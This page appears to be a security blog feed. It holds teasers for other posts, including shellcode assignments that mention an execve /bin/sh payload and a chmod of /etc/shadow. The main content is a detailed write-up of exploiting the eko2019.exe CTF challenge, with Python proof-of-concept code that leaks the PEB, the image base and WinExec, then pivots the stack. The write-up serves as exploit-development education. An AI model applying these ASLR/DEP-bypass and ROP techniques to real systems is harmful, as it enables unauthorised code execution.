Normal view

There are new articles available, click to refresh the page.
Before yesterdayVulnerabily Research

NotSoSmartConfig: broadcasting WiFi credentials Over-The-Air

20 April 2020 at 16:00
During one of our latest IoT Penetration Tests we tested a device based on the ESP32 SoC by EspressIF. While assessing the activation procedure we faced for the first time a beautiful yet dangerous protocol: SmartConfig. The idea behind the SmartConfig protocol is to allow an unconfigured IoT device to connect to a WiFi network without requiring a direct connection between the configurator and the device itself – I know, it’s scary.

Tabletopia: from XSS to RCE

By: voidsec
8 April 2020 at 15:02

During this period of social isolation, a friend of mine proposed to play some online “board games”. He proposed “Tabletopia”: a cool sandbox virtual table with more than 800 board games. Tabletopia is both accessible from its own website and from the Steam’s platform. While my friends decided to play from their browser, I’ve opted […]

The post Tabletopia: from XSS to RCE appeared first on VoidSec.

SLAE – Assignment #7: Custom Shellcode Crypter

By: voidsec
2 April 2020 at 14:55

Assignment #7: Custom Shellcode Crypter Seventh and last SLAE’s assignment requires to create a custom shellcode crypter. Since I had to implement an entire encryption schema both in python as an helper and in assembly as the main decryption routine, I’ve opted for something simple. I’ve chosen the Tiny Encryption Algorithm (TEA) as it does […]

The post SLAE – Assignment #7: Custom Shellcode Crypter appeared first on VoidSec.

SLAE – Assignment #6: Polymorphic Shellcode

By: voidsec
2 April 2020 at 14:39

Assignment #6: Polymorphic Shellcode Sixth SLAE’s assignment requires to create three different (polymorphic) shellcodes version starting from published Shell Storm’s examples. I’ve decided to take this three in exam: http://shell-storm.org/shellcode/files/shellcode-752.php – linux/x86 execve (“/bin/sh”) – 21 bytes http://shell-storm.org/shellcode/files/shellcode-624.php – linux/x86 setuid(0) + chmod(“/etc/shadow”,0666) – 37 bytes http://shell-storm.org/shellcode/files/shellcode-231.php – linux/x86 open cd-rom loop (follows “/dev/cdrom” symlink) […]

The post SLAE – Assignment #6: Polymorphic Shellcode appeared first on VoidSec.

Exploit Development: Rippity ROPpity The Stack Is Our Property - Blue Frost Security eko2019.exe Full ASLR and DEP Bypass on Windows 10 x64

27 March 2020 at 00:00

Introduction

I recently have been spending the last few days working on obtaining some more experience with reverse engineering to complement my exploit development background. During this time, I stumbled across this challenge put on by Blue Frost Security earlier in the year- which requires both reverse engineering and exploit development skills. Although I would by no means consider myself an expert in reverse engineering, I decided this would be a nice way to try to become more well versed with the entire development lifecycle, starting with identifying vulnerabilities through reverse engineering to developing a functioning exploit.

Before we begin, I will be using using Ghidra and IDA Freeware 64-bit to reverse the eko2019.exe application. In addition, I’ll be using WinDbg to develop the exploit. I prefer to use IDA to view the execution of a program- but I prefer to use the Ghidra decompiler to view the code that the program is comprised of. In addition to the aforementioned information, this exploit will be developed on Windows 10 x64 RS2, due to the fact the I already had a VM with this OS ready to go. This exploit will work up to Windows 10 x64 RS6 (1903 build), although the offsets between addresses will differ.

Reverse, Reverse!

Starting the application, we can clearly see the server has echoed some text into the command prompt where the server is running.

After some investigation, it seems this application binds to port 54321. Looking at the text in the command prompt window leads me to believe printf(), or similar functions, must have been called in order for the application to display this text. I am also inclined to believe that these print functions must be located somewhere around the routine that is responsible for opening up a socket on port 54321 and accepting messages. Let’s crack open eko2019.exe in IDA and see if our hypothesis is correct.

By opening the Strings subview in IDA, we can identify all of the strings within eko2019.exe.

As we can see from the above image, we have identified a string that seems like a good place to start! "[+] Message received: %i bytes\n" is indicative that the server has received a connection and message from the client (us). The function/code that is responsible for incoming connections may be around where this string is located. By double-clicking on .data:000000014000C0A8 (the address of this string), we can get a better look at the internals of the eko2019.exe application, as shown below.

Perfect! We have identified where the string "[+] Message received: %i bytes\n" resides. In IDA, we have the ability to cross reference where a function, routine, instruction, etc. resides. This functionality is outlined by DATA XREF: sub_1400011E0+11E↑o comment, which is a cross reference of data in this case, in the above image. If we double click on sub_1400011E0+11E↑o in the DATA XREF comment, we will land on the function in which the "[+] Message received: %i bytes\n" string resides.

Nice! As we can see from the above image, the place in which this string resides, is location (loc) loc_1400012CA. If we trace execution back to where it originated, we can see that the function we are inside is sub_1400011E0 (eko2019.exe+0x11e0).

After looking around this function for awhile, it is evident this is the function that handles connections and messages! Knowing this, let’s head over to Ghidra and decompile this function to see what is going on.

Opening the function in Ghidra’s decompiler, a few things stand out to us, as outlined in the image below.

Number one, The local_258 variable is initialized with the recv() function. Using this function, eko2019.exe will “read in” the data sent from the client. The recv() function makes the function call with the following arguments:

  • A socket file descriptor, param_1, which is inherited from the void FUN_1400011e0 function.
  • A pointer to where the buffer that was received will be written to (local_28).
  • The specified length which local_28 should be (0x10 hexadecimal bytes/16 decimal bytes).
  • Zero, which represents what flags should be implemented (none in this case).

What this means, is that the size of the request received by the recv() function will be stored in the variable local_258.

This is how the call looks, disassembled, within IDA.

The next line of code after the value of local_258 is set, makes a call to printf() which displays a message indicating the “header” has been received, and prints the value of local_258.

printf(s__[+]_Header_received:_%i_bytes_14000c008,(ulonglong)local_258)

We can interpret this behavior as that eko2019.exe seems to accept a header before the “message” portion of the client request is received. This header must be 0x10 hexadecimal bytes (16 decimal bytes) in length. This is the first “check” the application makes on our request, thus being the first “check” we must bypass.

Number two, after the header is received by the program, the specific variable that contains the pointer to the buffer received by the previous recv() request (local_28) is compared to the string constant 0x393130326f6b45, or Eko2019 in text form, in an if statement.

if (local_28 == 0x393130326f6b45) {

Taking a look at the data type of the local_28, declared at the beginning of this function, we notice it is a longlong. This means that the variable should 8 bytes in totality. We notice, however, that 0x393130326f6b45 is only 7 bytes in length. This behavior is indicatory that the string of Eko2019 should be null terminated. The null character will provide the last byte needed for our purposes.

This is how this check is executed, in IDA.

Number three, is the variable local_20’s size is compared to 0x201 (513 decimal).

if (local_20 < 0x201) {

Where does this variable come from you ask? If we take a look two lines down, we can see that local_20 is used in another recv() call, as the length of the buffer that stores the request.

local_258 = recv(param_1,local_238,(uint)(ushort)local_20,0);

The recv() call here again uses the same type of arguments as the previous call and reuses the variable local_258. Let’s take a look at the declaration of the variable local_238 in the above recv() function call, as it hasn’t been referenced in this blog post yet.

char local_238 [512];

This allocates a buffer of 512 bytes. Looking at the above recv() call, here is how the arguments are lined up:

  • A socket file descriptor, param_1, which is inherited from the void FUN_1400011e0 function is used again.
  • A pointer to where the buffer that was received will be written to (local_238 this time, which is 512 bytes).
  • The specified length, which is represented by local_20. This variable was used in the check implemented above, which looks to see if the size of the data recieved in the buffer is 512 bytes or less.
  • Zero, which represents what flags should be implemented (none in this case).

The last check looks to see if our message is sent in a multiple of 8 (aka aligned properly with a full 8 byte address). This check can be identified with relative ease.

uVar2 = (int)local_258 >> 0x1f & 7;
if ((local_258 + uVar2 & 7) == uVar2) {
          iVar1 = printf(s__[+]_Remote_message_(%i):_'%s'_14000c0f8,(ulonglong)DAT_14000c000, local_238);

The size of local_258, which at this point is the size of our message (not the header), is shifted to the right, via the bitwise operator >>. This value is then bitwise AND’d with 7 decimal. This is what the result would look like if our message size was 0x200 bytes (512 decimal), which is a known multiple of 8.

This value gets stored in the uVar2 variable, which would now have a value of 0, based on the above photo.

If we would like our message to go through, it seems as though we are going to need to satisfy the above if statement. The if statement adds the value of local_258 (presumably 0x200 in this example) to the value of uVar2, while using bitwise AND on the result of the addition with 7 decimal. If the total result is equal to uVar2, which is 0, the message is sent!

As we can see, the statement local_258 + uVar2 == uVar2 is indeed true, meaning we can send our message!

Let’s try another scenario with a value that is not a multiple of 8, like 0x199.

Using the same forumla above, with the bitwise shift right operator, we yield a value of 0.

Taking this value of 0, adding it to 0x199 and using bitwise AND on the result- yields a nonzero value (1).

This means the if statement would have failed, and our message would not go have gone through (since 0x199 is not a multiple of 8)!

In total, here are the checks we must bypass to send our buffer:

  1. A 16 byte header (0x10 hexadecimal) with the string 0x393130326f6b45, which is null terminated, as the first 8 bytes (remember, the first 16 bytes of the request are interpreted as the header. This means we need 8 additional bytes appended to the null terminated string).
  2. Our message (not counting the header) must be 512 bytes (0x200 hexadecimal bytes) or less
  3. Our message’s length must be a multiple of 8 (the size of an x64 memory address)

Now that we have the ability to bypass the checks eko2019.exe makes on our buffer (which is comprised of the header and message), we can successfully interact with the server! The only question remains- where exactly does this buffer end up when it is received by the program? Will we even be able to locate this buffer? Is this only a partial write? Let’s take a look at the following snippet of code to find out.

local_250[0] = FUNC_140001170
hProcess = GetCurrentProcess();
WriteProcessMemory(hProcess,FUN_140001000,local_250,8,&local_260);

The Windows API function GetCurrentProcess() first creates a handle to the current process (eko2019.exe). This handle is passed to a call to WriteProcessMemory(), which writes data to an area of memory in a specified process.

According Microsoft Docs (formerly known as MSDN), a call to WriteProcessMemory() is defined as such.

BOOL WriteProcessMemory(
  HANDLE  hProcess,
  LPVOID  lpBaseAddress,
  LPCVOID lpBuffer,
  SIZE_T  nSize,
  SIZE_T  *lpNumberOfBytesWritten
);
  • hProcess in this case is will be set to the current process (eko2019.exe).
  • lpBaseAddress is set to the function inside of eko2019.exe, sub_140001000 (eko2019.exe+0x1000). This will be where WriteProcessMemory() starts writing memory to.
  • lpBuffer is where the memory written to lpBaseAddress will be taken from. In our case, the buffer will be taken from function sub_140001170 (eko2019.exe+0x1170), which is represented by the variable local_250.
  • nSize is statically assigned as a value of 8, this function call will write one QWORD.
  • *lpNumberOfBytesWritten is a pointer to a variable that will receive the number of bytes written.

Now that we have better idea of what will be written where, let’s see how this all looks in IDA.

There are something very interesting going on in the above image. Let’s start with the following instructions.

lea rcx, unk_14000E520
mov rcx, [rcx+rax*8]
call sub_140001170

If you can recall from the WriteProcessMemory() arguments, the buffer in which WriteProcessMemory() will write from, is actually from the function sub_140001170, which is eko2019.exe+0x1170 (via the local_250 variable). From the above assembly code, we can see how and where this function is utilized!

Looking at the assembly code, it seems as though the unkown data type, unk_14000E520, is placed into the RCX register. The value pointed to by this location (the actual data inside the unknown data type), with the value of RAX tacked on, is then placed fully into RCX. RCX is then passed as a function parameter (due to the x64 __fastcall calling convention) to function sub_140001170 (eko2019.exe+0x1170).

This function, sub_140001170 (eko2019.exe+0x1170), will then return its value. The returned value of this function is going to be what is written to memory, via the WriteProcessMemory() function call.

We can recall from the WriteProcessMemory() function arguments earlier, that the location to which sub_140001170 will be written to, is sub_140001000 (eko2019.exe+0x1000). What is most interesting, is that this location is actually called directly after!

call sub_140001000

Let’s see what sub_140001000 looks in IDA.

Essentially, when sub_140001000 (eko2019.exe+0x1000) is called after the WriteProcessMemory() routine, it will land on and execute whatever value the sub_140001170 (eko2019.exe+0x1170) function returns, along with some NOPS and a return.

Can we leverage this functionality? Let’s find out!

Stepping Stones

Now that we know what will be written to where, let’s set a breakpoint on this location in memory in WinDbg, and start stepping through each instruction and dumping the contents of the registers in use. This will give us a clearer understanding of the behavior of eko2019.exe

Here is the proof of concept we will be using, based on the checks we have bypassed earlier.

import sys
import os
import socket
import struct
import time

# Defining sleep shorthand
sleep = time.sleep

# 16 total bytes
print "[+] Sending the header..."
exploit = "\x45\x6B\x6F\x32\x30\x31\x39\x00" + "\x90"*8

# 512 bytes + 16 byte header = 528 total bytes
exploit += "\x41" * 512

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("172.16.55.132", 54321))
s.sendall(exploit)
s.recv(1024)
s.close()

Before sending this proof of concept, let’s make sure a breakpoint is set at ek2010.exe+0x1330 (sub_140001330), as this is where we should land after our header is sent.

After sending our proof of concept, we can see we hit our breakpoint.

In addition to execution pausing, it seems as though we also control 0x1f8 bytes on the stack (504 decimal).

Let’s keep stepping through instructions, to see where we get!

After stepping through a few instructions, execution lands at this instruction, shown below.

lea rcx,[eko2019+0xe520 (00007ff6`6641e520)]

This instruction loads the address of eko2019.exe+0xe520 into RCX. Looking back, we recall the following is the decompiled code from Ghidra that corresponds to our current instruction.

lea rcx, unk_14000E520
mov rcx, [rcx+rax*8]
call sub_140001170

If we examine what is located at eko2019.exe+0xe520, we come across some interesting data, shown below.

It seems as though this value, 00488b01c3c3c3c3, will be loaded into RCX. This is very interesting, as we know that c3 bytes are that of a “return” instruction. What is of even more interest, is the first byte is set to zero. Since we know RAX is going to be tacked on to this value, it seems as though whatever is in RAX is going to complete this string! Let’s step through the instruction that does this.

RAX is currently set to 0x3e

The following instruction is executed, as shown below.

mov rcx, [rcx+rax*8]

RCX now contains the value of RAX + RCX!

Nice! This value is now going to be passed to the sub_140001170 (eko2019.exe+0x1170) function.

As we know, most of the time a function executes- the value it returns is placed in the accumulator register (RAX in this case). Take a look at the image below, which shows what value the sub_140001170 (eko2019.exe+0x1170) function returns.

Interesting! It seems as though the call to sub_140001170 (eko2019.exe+0x1170) inverted our bytes!

Based off of the research we have done previously, it is evident that this is the QWORD that is going to be written to sub_140001000 via the WriteProcessMemory() routine!

As we can see below, the next item up for execution (that is of importance) is the GetCurrentProcess() routine, which will return a handle to the current process (eko2019.exe) into RAX, similarly to how the last function returned its value into RAX.

Taking a look into RAX, we can see a value of ffffffffffffffff. This represents the current process! For instance, if we wanted to call WriteProcessMemory() outside of a debugger in the C programming language for example, specifying the first function argument as ffffffffffffffff would represent the current process- without even needing to obtain a handle to the current process! This is because technically GetCurrentProccess() returns a “pseudo handle” to the current process. A pseudo handle is a special constant of (HANDLE)-1, or ffffffffffffffff.

All that is left now, is to step through up until the call to WriteProcessMemory() to verify everything will write as expected.

Now that WriteProcessMemory() is about to be called- let’s take a look at the arguments that will be used in the function call.

The fifth argument is located at RSP + 0x20. This is what the __fastcall calling convention defaults to after four arguments. Each argument after 5th will start at the location of RSP + 0x20. Each subsequent argument will be placed 8 bytes after the last (e.g. RSP + 0x28, RSP + 0x30, etc. Remember, we are doing hexadecimal math here!).

Awesome! As we can see from the above image, WriteProcessMemory() is going to write the value returned by sub_140001170 (eko2019.exe+0x1170), which is located in the R8 register, to the location of sub_140001000 (eko2019.exr+0x1000).

After this function is executed, the location to which WriteProcessMemory() wrote to is called, as outlined by the image below.

Cool! This function received the buffer from the sub_140001170 (eko2019.exe+0x1170) function call. When those bytes are interpreted by the disassembler, you can see from the image above- this 8 byte QWORD is interpreted as an instruction that moves the value pointed to by RCX into RAX (with the NOPs we previously discovered with IDA)! The function returns the value in RAX and that is the end of execution!

Is there any way we can abuse this functionality?

Curiosity Killed The Cat? No, It Just Turned The Application Into One Big Info Leak

We know that when sub_140001000 (eko2019.exe+0x1000) is called, the value pointed to by RCX is placed into RAX and then the function returns this value. Since the program is now done accepting and returning network data to clients, it would be logical that perhaps the value in RAX may be returned to the client over a network connection, since the function is done executing! After all, this is a client/server architecture. Let’s test this theory, by updating our proof of concept.

import sys
import os
import socket
import struct
import time

# Defining sleep shorthand
sleep = time.sleep

# 16 total bytes
print "[+] Sending the header..."
exploit = "\x45\x6B\x6F\x32\x30\x31\x39\x00" + "\x90"*8

# 512 bytes + 16 byte header = 528 total bytes
exploit += "\x41" * 512

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("172.16.55.132", 54321))
s.sendall(exploit)

# Can we receive any data back?
test = s.recv(1024)
test_unpack = struct.unpack_from('<Q', test)
test_index = test_unpack[0]

print "[+] Did we receive any data back from the server? If so, here it is: {0}".format(hex(test_index))

# Closing the connection
s.close()

What this updated code will do is read in 1024 bytes from the server response. Then, the struct.unpack_from() function will interpret the data received back in the response from the server in the form of an unsigned long long (8 byte integer basically). This data is then indexed at its “first” position and formatted into hex and printed!

If you recall from the previous image in the last section that outlined the mov rax, qword ptr [ecx] operation in the sub_140001000 function, you will see the value that was moved into RAX was 0x21d. If everything goes as planned, when we run this script- that value should be printed to the screen in our script! Let’s test it out.

Awesome! As you can see, we were able to extract and view the contents of the returned value of the function call to sub_140001000 (eko2019.exe+0x1000) remotely (aka RAX)! This means that we can obtain some type of information leakage (although, it is not particuraly useful at the moment).

As reverse engineers, vulnerability researchers, and exploit developers- we are taught never to accept things at face value! Although eko2019.exe tells us that we are not supposed to send a message longer than 512 bytes- let’s see what happens when we send a value greater than 512! Adhering to the restriction about our data being in a multiple of 8, let’s try sending 528 bytes (in just the message) to the server!

Interesting! The application crashes! However, before you jump to conclusions- this is not the result of a buffer overflow. The root cause is something different! Let’s now identify where this crash occurs and why.

Let’s reattach eko2019.exe to WinDbg and view the execution right before the call to sub_140001170 (eko2019.exe+0x1170).

Again, execution is paused right before the call to sub_140001170 (eko2019.exe+0x1170)

At this point, the value of RAX is about to be added to the following data again.

Let’s check out the contents of the RAX register, to see what is going to get tacked on here!

Very interesting! It seems as though we now actually control the byte in RAX- just by increasing the number of bytes sent! Now, if we step through the WriteProcessMemory() function call that will write this string and call it later on, we can see that this is why the program crashes.

As you can see, execution of our program landed right before the move instruction, which takes the contents pointed to by RCX and places it into RAX. As we can see below, this was not an access violation because of DEP- but because it is obviously an invalid pointer. DEP doesn’t apply here, because we are not executing from the stack.

This is all fine and dandy- but the REAL issue can be identified by looking at the state of the registers.

This is the exciting part- we actually control the contents of the RCX register! This essentially gives us an arbitrary read primtive due to the fact we can control what gets loaded into RCX, extract its contents into RAX, and return it remotely to the client! There are four things we need to take into consideration:

  1. Where are the bytes in our message buffer stored into RCX
  2. What exactly should we load into RCX?
  3. Where is the byte that comes before the mov rax, qword ptr [rcx] instruction located?
  4. What should we change said byte to?

Let’s address numbers three and four in the above list firstly.

Bytes Bytes Baby

In a previous post about ROP, we talked about the concept of byte splitting. Let’s apply that same concept here! For instance, \x41 is an opcode, that when combined with the opcodes \x48\x8b\x01 (which makes up the move instruction in eko2019.exe we are talking about) does not produce a variant of said instruction.

Let’s put our brains to work for a second. We have an information leak currently- but we don’t have any use for it at the moment. As is common, let’s leverage this information leak to bypass ASLR! To do this, lets start by trying to access the Process Environment Block, commonly referred to as the PEB, for the current process (eko2019.exe)! The PEB for a process is the user mode representation of a process, similarly to how _EPROCESS is the kernel mode representation of kernel mode objects.

Why is this relevant this you ask? Since we have the ability to extract the pointer from a location in memory, we should be able to use our byte splitting primitive to our advantage! The PEB for the current process can be accessed through a special segment register, GS, at an offset of 0x60. Recall from this previous of two posts about kernel shellcode, that a segment register is just a register that is used to access different types of data structures (such as the PEB of the current process). The PEB, as will be explained later, contains some very prudent information that can be leveraged to turn our information leak into a full ASLR bypass.

We can potentially replace the \x41 in front of our previous mov rax, qword ptr [rcx] instruction, and change it to create a variant of said instruction, mov rax, qword ptr gs:[rcx]! This would also mean, however, that we would need to set RCX to 0x60 at the time of this instruction.

Recall that we have the ability to control RCX at this time! This is ideal, because we can use our ability to control RCX to load the value of 0x0000000000000060 into it- and access the GS segment register at this offset!

After some research, it seems as though the bytes \x65\x48\x8b\x01 are used to create the instruction mov rax, qword ptr gs:[rcx]. This means we need to replace the \x41 byte that caused our access violation with a \x65 byte! Firstly, however, we need to identify where this byte is within our proof of concept.

Updating our proof of concept, we found that the byte we need to replace with \x65 is at an offset of 512 into our 528 byte buffer. Additionally, the bytes that control the value of RCX seem to come right after said byte! This was all found through trial and error.

import sys
import os
import socket
import struct
import time

# Defining sleep shorthand
sleep = time.sleep

# 16 total bytes
print "[+] Sending the header..."
exploit = "\x45\x6B\x6F\x32\x30\x31\x39\x00" + "\x90"*8

# 512 bytes + 16 byte header = 528 total bytes

# 512 byte offset to the byte we control
exploit += "\x41" * 512

# The GS segment register gives us access to the PEB at an offset of 0x60
exploit += "\x65"

# \x60 will be moved in gs:[rcx] (\x41's are padding)
exploit += "\x41\x41\x41\x41\x41\x41\x41\x60"

# Must be a multiple of 8- so null bytes to compensate for the other 7 bytes
exploit += "\x00\x00\x00\x00\x00\x00\x00"

# Message needs to be 528 bytes total
exploit += "\x41" * (544-len(exploit))

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("172.16.55.132", 54321))
s.sendall(exploit)

# Indexing the response to view RAX (PEB)
receive = s.recv(1024)
peb_unpack = struct.unpack_from('<Q', receive)
peb_addr = peb_unpack[0]

print "[+] PEB is located at: {0}".format(hex(peb_addr))

# Closing the connection
s.close()

As you can see from the image below, when we hit the move operation and we have got the correct instruction in place.

RAX now contains the value of PEB!

In addition, our remote client has been able to save the PEB into a variable, which means we can always dynamically resolve this value. Note that this value will always change after the application (process) is restarted.

What is most devastating about identifying the PEB of eko2019.exe, is that the base address for the current process (eko2019.exe in this case) is located at an offset of PEB+0x10

Essentially, all we have to do is use our ability to control RCX to load the value of PEB+0x10 into it. At that point, the application will extract that value into RAX (what PEB+0x10 points to). The data PEB+0x10 points to is the actual base virtual address for eko2019.exe! This value will then be returned to the client, via RAX. This will be done with a second request! Note that this time we do not need to access the GS segment register (in the second request). If you can recall, before we accessed the GS segment register, the program naturally executed a mov rax, qword ptr[rcx] instruction. To ensure this is the instruction executed this time, we will use our byte we control to implement a NOP- to slide into the intended instruction.

As mentioned earlier, we will close our first connection to the client, and then make a second request! This update to the exploit development process is outlined in the updated proof of concept.

import sys
import os
import socket
import struct
import time

# Defining sleep shorthand
sleep = time.sleep

# 16 total bytes
print "[+] Sending the header..."
exploit = "\x45\x6B\x6F\x32\x30\x31\x39\x00" + "\x90"*8

# 512 bytes + 16 byte header = 528 total bytes

# 512 byte offset to the byte we control
exploit += "\x41" * 512

# The GS segment register gives us access to the PEB at an offset of 0x60
exploit += "\x65"

# \x60 will be moved in gs:[rcx] (\x41's are padding)
exploit += "\x41\x41\x41\x41\x41\x41\x41\x60"

# Must be a multiple of 8- so null bytes to compensate for the other 7 bytes
exploit += "\x00\x00\x00\x00\x00\x00\x00"

# Message needs to be 528 bytes total
exploit += "\x41" * (544-len(exploit))

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("172.16.55.132", 54321))
s.sendall(exploit)

# Indexing the response to view RAX (PEB)
receive = s.recv(1024)
peb_unpack = struct.unpack_from('<Q', receive)
peb_addr = peb_unpack[0]

print "[+] PEB is located at: {0}".format(hex(peb_addr))

# Closing the connection
s.close()

# Allow buffer room
sleep(2)

# 2nd stage

# 16 total bytes
print "[+] Sending the second header..."
exploit_2 = "\x45\x6B\x6F\x32\x30\x31\x39\x00" + "\x90"*8

# 512 byte offset to the byte we control
exploit_2 += "\x41" * 512

# Just want a vanilla mov rax, qword ptr[rcx], which already exists- so sliding in with a NOP to this instruction
exploit_2 += "\x90"

# Padding to loading PEB+0x10 into rcx
exploit_2 += "\x41\x41\x41\x41\x41\x41\x41"
exploit_2 += struct.pack('<Q', peb_addr+0x10)

# Message needs to be 528 bytes total
exploit_2 += "\x41" * (544-len(exploit_2))

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("172.16.55.132", 54321))
s.sendall(exploit_2)

# Indexing the response to view RAX (Base VA of eko2019.exe)
receive_2 = s.recv(1024)
base_va_unpack = struct.unpack_from('<Q', receive_2)
base_address = base_va_unpack[0]

print "[+] The base address for eko2019.exe is located at: {0}".format(hex(base_address))

# Closing the connection
s.close()

We hit our NOP and then execute it, sliding into our intended instruction.

We execute the above instruction- and we see a virtual address has been loaded into RAX! This is presumably the base address of eko2019.exe.

To verify this, let’s check what the base address of eko2019.exe is in WinDbg.

Awesome! We have successfully extracted the base virtual address of eko2019.exe and stored it in a variable on the remote client.

This means now, that when we need to execute our code in the future- we can dynamically resolve our ROP gadgets via offsets- and ASLR will no longer be a problem! The only question remains- how are we going to execute any code?

Mom, The Application Is Still Leaking!

For this blog post, we are going to pop calc.exe to verify code execution is possible. Since we are going to execute calc.exe as our proof of concept, using the Windows API function WinExec() makes the most sense to us. This is much easier than going through with a full VirtualProtect() function call, to make our code executable- since all we will need to do is pop calc.exe.

Since we already have the ability to dynamically resolve all of eko2019.exe’s virtual address space- let’s see if we can find any addresses within eko2019.exe that leak a pointer to kernel32.dll (where WinExec() resides) or WinExec() itself.

As you can see below, eko2019.exe+0x9010 actually leaks a pointer to WinExec()!

This is perfect, due to the fact we have a read primitive which extracts the value that a virtual address points to! In this case, eko2019.exe+0x9010 points to WinExec(). Again, we don’t need to push rcx or access any special registers like the GS segment register- we just want to extract the pointer in RCX (which we will fill with eko2019.exe+0x9010). Let’s update our proof of concept with a fourth request, to leak the address of WinExec() in kernel32.dll.

import sys
import os
import socket
import struct
import time

# Defining sleep shorthand
sleep = time.sleep

# 16 total bytes
print "[+] Sending the header..."
exploit = "\x45\x6B\x6F\x32\x30\x31\x39\x00" + "\x90"*8

# 512 bytes + 16 byte header = 528 total bytes

# 512 byte offset to the byte we control
exploit += "\x41" * 512

# The GS segment register gives us access to the PEB at an offset of 0x60
exploit += "\x65"

# \x60 will be moved in gs:[rcx] (\x41's are padding)
exploit += "\x41\x41\x41\x41\x41\x41\x41\x60"

# Must be a multiple of 8- so null bytes to compensate for the other 7 bytes
exploit += "\x00\x00\x00\x00\x00\x00\x00"

# Message needs to be 528 bytes total
exploit += "\x41" * (544-len(exploit))

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("172.16.55.132", 54321))
s.sendall(exploit)

# Indexing the response to view RAX (PEB)
receive = s.recv(1024)
peb_unpack = struct.unpack_from('<Q', receive)
peb_addr = peb_unpack[0]

print "[+] PEB is located at: {0}".format(hex(peb_addr))

# Closing the connection
s.close()

# Allow buffer room
sleep(2)

# 2nd stage

# 16 total bytes
print "[+] Sending the second header..."
exploit_2 = "\x45\x6B\x6F\x32\x30\x31\x39\x00" + "\x90"*8

# 512 byte offset to the byte we control
exploit_2 += "\x41" * 512

# Just want a vanilla mov rax, qword ptr[rcx], which already exists- so sliding in with a NOP to this instruction
exploit_2 += "\x90"

# Padding to loading PEB+0x10 into rcx
exploit_2 += "\x41\x41\x41\x41\x41\x41\x41"
exploit_2 += struct.pack('<Q', peb_addr+0x10)

# Message needs to be 528 bytes total
exploit_2 += "\x41" * (544-len(exploit_2))

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("172.16.55.132", 54321))
s.sendall(exploit_2)

# Indexing the response to view RAX (Base VA of eko2019.exe)
receive_2 = s.recv(1024)
base_va_unpack = struct.unpack_from('<Q', receive_2)
base_address = base_va_unpack[0]

print "[+] The base address for eko2019.exe is located at: {0}".format(hex(base_address))

# Closing the connection
s.close()

# Allow buffer room
sleep(2)

# 3rd stage

# 16 total bytes
print "[+] Sending the third header..."
exploit_3 = "\x45\x6B\x6F\x32\x30\x31\x39\x00" + "\x90"*8

# 512 byte offset to the byte we control
exploit_3 += "\x41" * 512

# Just want a vanilla mov rax, qword ptr[rcx], which already exists- so sliding in with a NOP to this instruction
exploit_3 += "\x90"

# Padding to load eko2019.exe+0x9010
exploit_3 += "\x41\x41\x41\x41\x41\x41\x41"
exploit_3 += struct.pack('<Q', base_address+0x9010)

# Message needs to be 528 bytes total
exploit_3 += "\x41" * (544-len(exploit_3))

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("172.16.55.132", 54321))
s.sendall(exploit_3)

# Indexing the response to view RAX (VA of kernel32!WinExec)
receive_3 = s.recv(1024)
kernel32_unpack = struct.unpack_from('<Q', receive_3)
kernel32_winexec = kernel32_unpack[0]

print "[+] kernel32!WinExec is located at: {0}".format(hex(kernel32_winexec))

# Close the connection
s.close()

Landing on the move instruction, we can see that the address of WinExec() is about to be extracted from RCX!

When this instruction executes, the value will be loaded into RAX and then returned to us (the client)!

Do What You Can, With What You Have, Where You Are- Teddy Roosevelt

Recall up until this point, we have the following primitives:

  1. Write primitive- we can control the value of RCX, one byte around our mov instruction, and we can control a lot of the stack.
  2. Read primitive- we have the ability to read in values of pointers.

Using our ability to control RCX, we may have a potential way to pivot back to the stack. If you can recall from earlier, when we first increased our number of bytes from 512 to 528 and the \x41 byte was accessed BEFORE the mov rax, qword ptr [rcx] instruction was executed (which resulted in an access violation and a subsequent crash), the disassembler didn’t interpret \x41 as part of the mov rax, qword ptr [rcx] instruction set- because that opcode doesn’t create a valid set of opcodes with said move instruction.

Investigating a little bit more, we can recall that our move instruction also ends with a ret, which will take the value located at RSP (the stack), and execute it. Since we can control RCX- if we could find a way to load RCX into RSP, we would return to that value and execute it, via the ret that exits the function call. What would make sense to us, is to load RCX with a ROP gadget that would add rsp, X (which would make RSP point into our user controlled portion of the stack) and then start executing there! The question still remains however- even though we can control RCX, how are we going to execute what is in it?

After some trial and error, I finally came to a pretty neat conclusion! We can load RCX with the address of our stack pivot ROP gadget. We can then replace the \x41 byte from earlier (we changed this byte to \x65 in the PEB portion of this exploit) with a \x51 byte!

The \x51 byte is the opcode that corresponds to the push rcx instruction! Pushing RCX will allow us to place our user controlled value of RCX onto the stack (which is a stack pivot ROP gadget). Pushing an item on the stack, will actually load said item into RSP! This means that we can load our own ROP gadget into RSP, and then execute the ret instruction to leave the function- which will execute our ROP gadget! The first step for us, is to find a ROP gadget! We will use rp++ to enumerate all ROP gadgets from eko2019.exe.

After running rp++, we find an ideal ROP gadget that will perform the stack pivot.

This gadget will raise the stack up in value, to load our user controlled values into RSP and subsequent bytes after RSP! Notice how each gadget does not show the full virtual address of the pointer. This is because of ASLR! If we look at the last 4 or so bytes, we can see that this is actually the offset from the base virtual address of eko2019.exe to said pointer. In this case, the ROP gadget we are going after is located at eko2019.exe + 0x158b.

Let’s update our proof of concept with the stack pivot implemented.

import sys
import os
import socket
import struct
import time

# Defining sleep shorthand
sleep = time.sleep

# 16 total bytes
print "[+] Sending the header..."
exploit = "\x45\x6B\x6F\x32\x30\x31\x39\x00" + "\x90"*8

# 512 bytes + 16 byte header = 528 total bytes

# 512 byte offset to the byte we control
exploit += "\x41" * 512

# The GS segment register gives us access to the PEB at an offset of 0x60
exploit += "\x65"

# \x60 will be moved in gs:[rcx] (\x41's are padding)
exploit += "\x41\x41\x41\x41\x41\x41\x41\x60"

# Must be a multiple of 8- so null bytes to compensate for the other 7 bytes
exploit += "\x00\x00\x00\x00\x00\x00\x00"

# Message needs to be 528 bytes total
exploit += "\x41" * (544-len(exploit))

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("172.16.55.132", 54321))
s.sendall(exploit)

